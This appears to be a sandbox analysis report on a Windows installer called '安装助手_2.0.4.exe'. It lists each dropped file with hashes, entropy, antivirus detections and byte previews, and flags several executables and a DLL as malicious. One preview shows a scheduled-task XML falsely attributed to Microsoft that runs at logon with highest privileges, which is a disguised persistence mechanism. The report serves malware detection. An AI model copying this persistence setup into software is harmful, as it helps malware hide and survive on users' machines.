                                        Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..
                                        Process:C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        File Type:7-zip archive data, version 0.4
                                        Category:dropped
                                        Size (bytes):31890
                                        Entropy (8bit):7.99402458740637
                                        Encrypted:true
                                        SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                                        MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                                        SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                                        SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                                        SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                                        Malicious:false
                                        Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.
                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):74960
                                        Entropy (8bit):7.99759370165655
                                        Encrypted:true
                                        SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                                        MD5:950338D50B95A25F494EE74E97B7B7A9
                                        SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                                        SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                                        SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                                        Malicious:false
                                        Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...
                                        Process:C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        File Type:7-zip archive data, version 0.4
                                        Category:dropped
                                        Size (bytes):74960
                                        Entropy (8bit):7.997593701656546
                                        Encrypted:true
                                        SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                                        MD5:059BA7C31F3E227356CA5F29E4AA2508
                                        SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                                        SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                                        SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                                        Malicious:false
                                        Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.
                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):29730
                                        Entropy (8bit):7.994290657653607
                                        Encrypted:true
                                        SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                                        MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                                        SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                                        SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                                        SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                                        Malicious:false
                                        Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.
                                        Process:C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        File Type:7-zip archive data, version 0.4
                                        Category:dropped
                                        Size (bytes):29730
                                        Entropy (8bit):7.994290657653608
                                        Encrypted:true
                                        SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                                        MD5:A9C8A3E00692F79E1BA9693003F85D18
                                        SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                                        SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                                        SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                                        Malicious:false
                                        Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8
                                        Process:C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        File Type:7-zip archive data, version 0.4
                                        Category:dropped
                                        Size (bytes):250000
                                        Entropy (8bit):7.999233217470124
                                        Encrypted:true
                                        SSDEEP:6144:1CV1oCvUxznH9Oxyyt42fnM+KhFtVbiOO:AV1o4Wzn9l2/HonbiP
                                        MD5:8ABFBD435E4C97ADECC98054531BDB10
                                        SHA1:45EE0AE577F885C664C7CBB9465DC3F5602D52DC
                                        SHA-256:2D6F169B3A86F7A5167C882D6AC0C600C4BDB50751D63873F77673EB01C6FB0F
                                        SHA-512:EB62FA8CF7B481EC94368A4329E599FFE891DF489F8D3DB51B1A6CA5637BBD3C397ACD3FE6025732315A072ABE7059CFB97A7E20DB31991C80C5F63F83918C18
                                        Malicious:false
                                        Preview:7z..'......0.......@........m.m.A..8..!K.`.GQ.........F..`:*!.Q..i..3..+..W..$.-....z.G.[4E.T.h.z!.k2.3.CMY1>....!y..>...i..zBb...K..$...i..{...@....}8.3^.J..u...7..R.a]..(aiRWE.P..ib<...X.0...o.v.lY...l.]_.7........C....{.r.1...Zf.)2fN-"HO.Z.0....s...kjO!.....I.-Hg...:7..k.kl...a..!....=...D.........yk..i...x..H..O.W..a..t..-m..B. ..z..G.~.P..e.dN......U.y.....7....R..~..h..*01i.Bty...q.Y+.8I..N.Q....w..^....u.._..D......2.....-.....M..w.u.[.>WzW.s....U.......%....>...8-...6.p..: .=P..cH..:UA.^.<.....P..@.^t..T.;.W&.Y....Q...@8P...4t...cr.zN....8.R)..m..:I..".7...r..o0:0.......@1.8..L#...l.%^.a21....L.c4.wc........_....a...".o...ge.#.`.{-.+.@o.....r,j..h<.!;......F.}....J..!..V..b..z....&!/.l.1...l.......rh..2.....8...v..Ie...mP.T..1D..TZs..Q.lc....&.b.[.7...A.)J.[..Z......q..n...r...n..........o....F.....0t...!.7.....Vj.._....a...r`.$..#11...^..{.4.]...]..+.......Q....,.}....'l..-.Ee.\n]....3..;]0.!.i.6fj.......e...R......$....qT
                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                        File Type:PE32+ executable (native) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):63640
                                        Entropy (8bit):6.482810107683822
                                        Encrypted:false
                                        SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                                        MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                                        SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                                        SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                                        SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 9%
                                        • Antivirus: Virustotal, Detection: 4%, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
                                        Process:C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):4096
                                        Entropy (8bit):3.344834847024567
                                        Encrypted:false
                                        SSDEEP:48:dXKLzDlnbL6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlnKwhldOVQOj6dKbKsz7
                                        MD5:7F252B19B6E96247184F55570325E9FA
                                        SHA1:E6D4AD432CB4864C0E1A08FB15255F7973807B3D
                                        SHA-256:84460DE817C9A6637650C7ED83D15DD14836FB841FF9790D4F2D1A8D6BAAB0ED
                                        SHA-512:A5741E4F5095BB24A28E5909CC659CB53535BD1E7A2555FA9D2660155F8CA80F96136E2CA589CCD2154FCF264B8FD525782B8C9752022B986F20D3F1454496EF
                                        Malicious:false
                                        Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvai
                                        Process:C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                        Category:dropped
                                        Size (bytes):5649408
                                        Entropy (8bit):6.392614480390128
                                        Encrypted:false
                                        SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                                        MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                                        SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                                        SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                                        SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):1.1940658735648508
                                        Encrypted:false
                                        SSDEEP:3:Nlllultnxj:NllU
                                        MD5:F93358E626551B46E6ED5A0A9D29BD51
                                        SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                        SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                        SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                        Malicious:false
                                        Preview:@...e................................................@..........
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):6144
                                        Entropy (8bit):4.720366600008286
                                        Encrypted:false
                                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                        MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                        SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                        SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                        SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):3598848
                                        Entropy (8bit):7.004949099807939
                                        Encrypted:false
                                        SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                        MD5:1D1464C73252978A58AC925ECE57F0FB
                                        SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                        SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                        SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 11%
                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):6144
                                        Entropy (8bit):4.720366600008286
                                        Encrypted:false
                                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                        MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                        SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                        SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                        SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):3598848
                                        Entropy (8bit):7.004949099807939
                                        Encrypted:false
                                        SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                        MD5:1D1464C73252978A58AC925ECE57F0FB
                                        SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                        SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                        SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 11%
                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):3366912
                                        Entropy (8bit):6.530548291878271
                                        Encrypted:false
                                        SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                        MD5:9902FA6D39184B87AED7D94A037912D8
                                        SHA1:F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
                                        SHA-256:43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
                                        SHA-512:BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
                                        Malicious:true
                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                        Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):3366912
                                        Entropy (8bit):6.530548291878271
